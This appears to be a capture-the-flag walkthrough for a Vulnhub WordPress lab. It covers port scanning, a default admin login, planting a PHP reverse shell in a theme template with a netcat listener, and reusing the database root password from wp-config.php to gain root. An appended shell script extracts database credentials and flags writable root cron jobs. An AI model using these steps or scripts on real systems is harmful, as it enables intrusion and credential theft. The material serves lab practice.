Once again we are back with the Vulnhub lab tutorials. This article covers a CTF lab in which you face three challenges. The lab is well suited to beginners, as there are only three flags to capture: 1. Get a shell. 2. Get root access. 3. Find the post-exploitation flag on the box. You can download this VM from here.
Let's start.
First, run an aggressive scan of the target IP with Nmap, as shown in the image:
nmap -p- -A 192.168.1.24
The Nmap result shows that ports 22, 53, 80, 110, 139, 143, 445, 993 and 995 are open, with services such as SSH and HTTP among them.
Since port 80 is open, browse to the victim IP 192.168.1.24. Its home page is shown in the image below:
The Nmap scan also revealed a robots.txt file. Reading robots.txt shows that the site runs WordPress, which is what we exploit in this scenario.
Let's take a look at the wordpress directory in the browser.
When I browsed to 192.168.1.24/wordpress/wp-login.php, I found the WordPress administrator login page.
To get into the WordPress administrator console we first enumerate its users with the WPScan tool; type the command shown in the image to start the WPScan enumeration.
WPScan's result shows two users, as you can see in the image below. We will continue with the admin user.
I tried the default credentials admin:admin and was logged in as admin. The console lets an administrator edit theme files, so we take advantage of these rights to plant a malicious script that gives us a reverse connection from the victim's system. The script we use is pentestmonkey's PHP reverse shell, available from: http://pentestmonkey.net/tools/web-shells/php-reverse-shell
Copy the PHP text of the downloaded script, set its $ip and $port variables to your attacking machine's IP and listening port, and paste it over the 404.php template of the selected theme.
Now start a netcat listener on the port you set in the script, then request a page that does not exist on the site so that WordPress serves the edited 404.php and the shell connects back:
nc -lvp 1234
Once you have the session, use the following commands
to navigate around :
cd /home
ls
In /home I found a wpadmin folder, which is obviously worth checking for a flag with the following commands:
cd wpadmin
ls
cat flag.txt
As the image above shows, we have found our first flag.
Another important file in any WordPress install is wp-config.php. Exploring it, I found the MySQL settings, which contain credentials for the database root user. In the image below you can see the username and password, root:rootpassword. Database passwords are often reused for the system root account, so that is the next thing to try.
Let's switch user to root with that password; you will then find the second flag in the root folder. Use the following commands:
su
rootpassword!
cd /root
ls
cat flag.txt
As we all know, cron.d is an important Linux directory for post-exploitation, so I checked it for the sake of it, and there I found our third and last flag. Use the following commands:
cd /etc
cd cron.d
ls
cat php5
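The wp-config.php and cron.d steps above were done by hand. Below is an added example, not part of the original write-up, of the same two post-exploitation checks as shell functions you could paste into the reverse shell: one pulls the DB_* defines (and the password to try against su) out of a wp-config.php, the other lists the jobs in a cron.d directory and flags any job whose program is writable by the current user, since a root job running a file we can edit is a direct privilege escalation. The wp-config.php contents, cron entries and file paths written by make_samples are constructed for the demo and are not the lab's real files.

```shell
#!/bin/sh
# Added example (not from the original write-up): post-exploitation helpers for
# wp-config.php and /etc/cron.d. All paths are assumptions; make_samples writes
# constructed files so the script runs offline.

# Print KEY=VALUE for the DB_* defines in the wp-config.php given as $1.
wp_db_creds() {
    sed -nE "s/^[[:space:]]*define\([[:space:]]*['\"](DB_NAME|DB_USER|DB_PASSWORD|DB_HOST)['\"][[:space:]]*,[[:space:]]*['\"]([^'\"]*)['\"][[:space:]]*\).*/\1=\2/p" "$1"
}

# Print just the DB password, the value worth trying with `su` in case it is reused.
wp_db_password() {
    wp_db_creds "$1" | sed -n 's/^DB_PASSWORD=//p'
}

# List every job in the cron.d directory $1 as "user<TAB>command".
# Unlike user crontabs, cron.d files carry a user field: m h dom mon dow user command.
cron_d_jobs() {
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        awk '
            /^[[:space:]]*#/ { next }                     # comment
            NF == 0 { next }                              # blank line
            /^[A-Za-z_][A-Za-z0-9_]*=/ { next }           # environment assignment, e.g. PATH=
            {
                if ($1 ~ /^@/) { user = $2; start = 3 }   # @reboot / @daily user command
                else           { user = $6; start = 7 }   # five time fields, then user
                if (NF < start) next
                cmd = $start
                for (i = start + 1; i <= NF; i++) cmd = cmd " " $i
                print user "\t" cmd
            }' "$f"
    done
}

# Flag jobs whose program (first word of the command) is writable by us.
# Prints "user<TAB>program"; a root entry here is a privilege escalation path.
cron_d_writable_programs() {
    tab=$(printf '\t')
    cron_d_jobs "$1" | while IFS="$tab" read -r user cmd; do
        set -- $cmd
        if [ -w "$1" ]; then printf '%s\t%s\n' "$user" "$1"; fi
    done
}

# Write constructed sample files (a wp-config.php and a cron.d directory) under $1.
make_samples() {
    mkdir -p "$1/cron.d"
    cat > "$1/wp-config.php" <<'EOF'
<?php
/** MySQL settings (constructed sample, not the lab's real file) */
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 's3cret-db-pa55');
define('DB_HOST', 'localhost');
define('WP_DEBUG', false);
EOF
    printf '#!/bin/sh\necho cleanup\n' > "$1/cleanup.sh"   # a script we own, hence writable
    cat > "$1/cron.d/php5" <<EOF
# constructed cron.d sample
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
0 * * * *  root  /usr/local/bin/sessionclean
@daily     root  $1/cleanup.sh
EOF
}

# Stand-alone demo on the constructed samples.
demo_dir=$(mktemp -d)
make_samples "$demo_dir"
wp_db_creds "$demo_dir/wp-config.php"
cron_d_jobs "$demo_dir/cron.d"
cron_d_writable_programs "$demo_dir/cron.d"
rm -rf "$demo_dir"
```

On a real box you would call wp_db_creds on /var/www/html/wordpress/wp-config.php (or wherever the site lives) and cron_d_jobs on /etc/cron.d; the writable-program check only looks at the first word of each command, so scripts invoked through an interpreter, for example "php /path/script.php", need a manual look.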
We have captured all three flags and thereby completed the CTF.
Author: Arpit Pandey is a Certified Ethical Hacker, Cyber Security Expert and Penetration Tester. Contact here.